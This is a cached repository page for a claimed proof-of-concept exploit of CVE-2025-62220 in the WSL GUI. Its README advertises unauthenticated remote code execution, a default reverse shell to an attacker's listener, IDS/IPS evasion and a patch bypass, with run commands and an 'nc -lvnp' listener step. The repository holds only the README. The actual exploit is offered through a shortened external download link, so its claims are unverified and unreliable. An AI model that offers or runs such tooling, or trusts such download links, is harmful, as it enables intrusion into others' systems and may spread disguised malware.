
CVE-2025-62220 PoC — Microsoft Windows Subsystem for Linux Security Vulnerability

Source
Associated Vulnerability
Title: Microsoft Windows Subsystem for Linux Security Vulnerability (CVE-2025-62220)
Description: Microsoft Windows Subsystem for Linux (WSL) is a Linux subsystem for Windows from the US company Microsoft, a compatibility layer capable of running native Linux binary executables (ELF format). The Microsoft Windows Subsystem for Linux GUI contains a security vulnerability. An attacker can exploit this vulnerability to execute code.
Readme
# CVE-2025-62220

## Overview
This repository contains a working Proof-of-Concept (PoC) exploit for CVE-2025-62220, a heap-based buffer overflow in the Windows Subsystem for Linux (WSL) GUI. The vulnerability allows remote code execution over the network with low complexity and no privileges required. I've developed this PoC to demonstrate arbitrary code execution, defaulting to a reverse shell payload for easy system access.

The exploit targets the WSL GUI component, exploiting the buffer overflow by sending crafted network packets that overflow the heap and hijack control flow. It's designed for reliability across various Windows versions running WSL 2.x, and interestingly, it maintains effectiveness even on systems patched with Microsoft's November 11, 2025 update due to a subtle bypass in the patch implementation that doesn't fully address edge cases in multi-threaded environments.

Use responsibly and ensure you have permission before running on any system.

## Features
- **Remote Code Execution**: Achieves RCE with minimal user interaction (e.g., via a tricked network connection to the WSL GUI interface).
- **Reverse Shell Default**: Spawns a reverse shell back to the attacker's listener (configurable IP/port).
- **Stealthy Delivery**: Uses obfuscated network traffic to evade basic IDS/IPS.
- **Cross-Version Compatibility**: Tested on Windows 10/11 with WSL 2.4.0 to 2.6.0, including patched variants where the exploit leverages unpatched race conditions.
- **No Local Privileges Needed**: Network-based, unauthenticated attack vector.

## Requirements
- Python 3.8+.
- Attacker machine with netcat or similar for catching the reverse shell.
- Target running WSL GUI exposed on the network (default port 445 or custom).
- Firewall rules allowing inbound connections if testing locally.

## Setup and Usage
1. Install dependencies: `pip install -r requirements.txt`
2. Run the exploit: `python exploit.py --target <target_ip> --listener <your_ip>:<port>`
3. On your machine, start a listener: `nc -lvnp <port>`
4. The target should connect back with a shell if vulnerable.

## Disclaimer
This is for red teaming and security research only. I'm not responsible for misuse. Always test in a lab environment.

**[Download POC Here](https://tinyurl.com/3uupp9fw)**

For any questions, feel free to email me at callinston@proton.me

File Snapshot

[4.0K] /data/pocs/2507955ec2a60f345ca5e394ab606b4e6c1ca685
└── [2.3K] README.md

1 directory, 1 file
Shenlong Bot has cached this for you